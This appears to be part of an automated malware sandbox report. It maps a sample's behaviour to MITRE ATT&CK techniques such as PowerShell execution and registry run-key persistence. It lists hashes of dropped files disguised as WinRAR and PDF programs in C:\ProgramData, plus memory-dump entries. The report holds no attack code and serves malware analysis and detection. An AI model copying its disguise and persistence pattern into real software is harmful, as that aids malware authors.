        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4372,i,3239535018877284530,3457823197501312703,262144 --variations-seed-version --mojo-platform-channel-handle=3980 /prefetch:8
1⤵
PID:4848

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\WinRaR.exe

Filesize
457KB

MD5
c8dcff7ac01d7f5da2357ad2f560aa25

SHA1
66d9d560e6eba3ad8839793016b690c38e4d1a15

SHA256
99328618624e4f19bcfd5ff5e8afb64a71ad141de9372bc1227050c5ba273741

SHA512
21fb8ece0b6df5e0cd8e68800e615d8974a4c8b841fbe3acaef95240646e35242acb6abf617c5a5614185428747a9422aaedf080293936c9b60e8bdc6318e6f0

Download Submit
C:\ProgramData\WinRaRS.exe

Filesize
113KB

MD5
27b7c1e1c6efb9e1e15cd5ddd18c0606

SHA1
a05e463db07de406acaf5379c627fc410f544556

SHA256
e4cb7a48900151fd31f110b692cc010e017463f92d2ad403f6cc9891889306ff

SHA512
591874fe517bab9f9ff14267088a8038da5b2082601f85847112c96c32a533eada7ad97594d5db1c1abea8b924d3863eeab66c751d65d21e82ed3996a55f88cf

Download Submit
C:\ProgramData\WinRar.vbs

Filesize
180KB

MD5
a11d30db36ba79960ed3e408979d851c

SHA1
9b5ccba948c577b35a4687edf378d6080be55a47

SHA256
336b3ee044a15bde31546384502eefbf230050a3c87cc5f392534d1d7378a5d2

SHA512
00049b7011249128e48d08a836e39eefeda83784ee56582ab4661070674ebeb7245a760da25b1ff3dd81a203abfff002b1bf3eadba88acbd1833d04156c9d5bb

Download Submit
C:\ProgramData\pdf.exe

Filesize
375KB

MD5
3d5592b6d7fa16d46e5f13122f961cdf

SHA1
5b6894cfe1717e8e49b1a3428fd7033f5e66b512

SHA256
9c2f4da0510695bef96b055e709262bb90c8c00bb212e02231026109182f7ddc

SHA512
a484a153c20e56079c4631e13e9407e2f8ac0f3a8fe8480945c1f549f0d00df750266d5952e0fd8c660c3225b09250b8ded794860dcae71e392c75694ee1466c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
47ad785a164d8ff087b5fc8372b82520

SHA1
f23b4ab647065004331d06eb701783f4c89a74dd

SHA256
03c404532d410575bc3c3aeb45e8c3f0156801f985eb66111aee0672e682155a

SHA512
c6e9e7d2b8148432dc274966915c6a0c801a44f1b40fa17fa88a185243087606986befe3f19ba16953aa6d6d7e57788a6a265c105d01deae7bd154313f4985a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
f642858e968e5c5495be2f1884809045

SHA1
44749c35a9897d0124e40bf615ad5b4f1fefed04

SHA256
335a60aec2c576c0d50ead1daea69589235abad39b6fe41a81cdc8cb87445ef3

SHA512
2f1292ae056a1b73a6c0e4c8dd98577684a1a6ae5c706124c2ca15389c03d7e4eb0c73613aaedf57e23fb4e6feaec5aacd9c95e17fdd7d82510092a031e3d966

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ruhawd4d.hq5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/452-29-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1136-44-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1136-78-0x0000000006070000-0x0000000006614000-memory.dmp

Filesize
5.6MB

Download
memory/1136-75-0x0000000005A20000-0x0000000005ABC000-memory.dmp

Filesize
624KB

Download
memory/2040-37-0x0000000072720000-0x0000000072ED0000-memory.dmp

Filesize
7.7MB

Download
memory/2040-27-0x0000000072720000-0x0000000072ED0000-memory.dmp

Filesize
7.7MB

Download
memory/2040-22-0x0000000000FE0000-0x0000000001042000-memory.dmp

Filesize
392KB

Download
memory/2040-21-0x000000007272E000-0x000000007272F000-memory.dmp

Filesize
4KB

Download
memory/2756-50-0x00000000057A0000-0x0000000005806000-memory.dmp

Filesize
408KB

Download
memory/2756-47-0x0000000002550000-0x0000000002586000-memory.dmp

Filesize
216KB

Download
memory/2756-61-0x0000000005980000-0x0000000005CD4000-memory.dmp

Filesize
3.3MB

Download
memory/2756-63-0x0000000005E80000-0x0000000005ECC000-memory.dmp

Filesize
304KB

Download
memory/2756-62-0x0000000005E40000-0x0000000005E5E000-memory.dmp

Filesize
120KB

Download
memory/2756-49-0x0000000004EA0000-0x0000000004EC2000-memory.dmp

Filesize
136KB

Download
memory/2756-51-0x0000000005910000-0x0000000005976000-memory.dmp

Filesize
408KB

Download
memory/2756-48-0x0000000004F10000-0x0000000005538000-memory.dmp

Filesize
6.2MB

Download
memory/2972-43-0x0000000000DF0000-0x0000000000E12000-memory.dmp

Filesize
136KB

Download
memory/3640-76-0x0000000007620000-0x0000000007C9A000-memory.dmp

Filesize
6.5MB

Download
memory/3640-80-0x0000000007120000-0x0000000007242000-memory.dmp

Filesize
1.1MB

Download
memory/3640-77-0x0000000006200000-0x000000000621A000-memory.dmp

Filesize
104KB

Download
memory/4984-81-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/4984-87-0x0000000005070000-0x0000000005102000-memory.dmp

Filesize
584KB

Download
memory/4984-88-0x0000000004FB0000-0x0000000004FBA000-memory.dmp

Filesize
40KB

Download